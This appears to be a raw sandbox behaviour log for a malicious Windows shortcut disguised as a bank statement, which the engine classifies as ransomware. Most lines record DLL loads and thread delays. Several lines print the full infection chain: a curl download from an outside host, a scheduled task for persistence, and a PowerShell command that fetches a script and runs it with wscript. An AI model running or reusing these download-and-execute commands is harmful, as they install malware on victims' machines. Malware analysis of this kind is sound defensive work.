Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
Source: classification engineClassification label: mal100.rans.winLNK@32/16@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4dac66.TMP
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2276:120:WilError_03
Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.batJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\curl.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat"" qWQnYbiCKtrx1y2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: chasebank_statement_mar.lnk | LNK file: ..\..\..\..\..\..\..\..\Windows\System32\cmd.exe
Source: C:\Windows\System32\wscript.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FF848F100BD pushad ; iretd 7_2_00007FF848F100C1

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\cmd.exe
Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Boot Survival

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4622
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4346
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2019
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3545
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3012 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2624 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6056 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1272 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4304 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: powershell.exe, 0000000E.00000002.2260297974.0000027A6871F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
Source: curl.exe, 00000002.00000003.1983871776.00000258B0F94000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2056651015.0000023F5B2BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2898856862.000002AD6F765000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -o Pfx5CcXoK0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /tr "'C:\Users\user\AppData\Local\Temp\Pfx5CcXoK0qm.bat' qWQnYbiCKtrx1y2" /sc minute /tn qWQnYbiCKtrx1y2 /mo 1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "IWR -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js'; schtasks /delete /tn qWQnYbiCKtrx1y2 /f; wscript C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn qWQnYbiCKtrx1y2 /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\Users\user\AppData\Local\Temp\EGLG6DJOY9K9.js
Source: unknown | Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c curl -o pfx5ccxok0qm.bat "https://admiralpub.ca/wp-content/uploads/2017/olympiadic.php" & schtasks /create /f /tr "'c:\users\user\appdata\local\temp\pfx5ccxok0qm.bat' qwqnybicktrx1y2" /sc minute /tn qwqnybicktrx1y2 /mo 1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -com "iwr -useb 'https://admiralpub.ca/wp-content/uploads/2017/oligophosphaturia.php' -outf 'c:\users\user\appdata\local\temp\eglg6djoy9k9.js'; schtasks /delete /tn qwqnybicktrx1y2 /f; wscript c:\users\user\appdata\local\temp\eglg6djoy9k9.js"
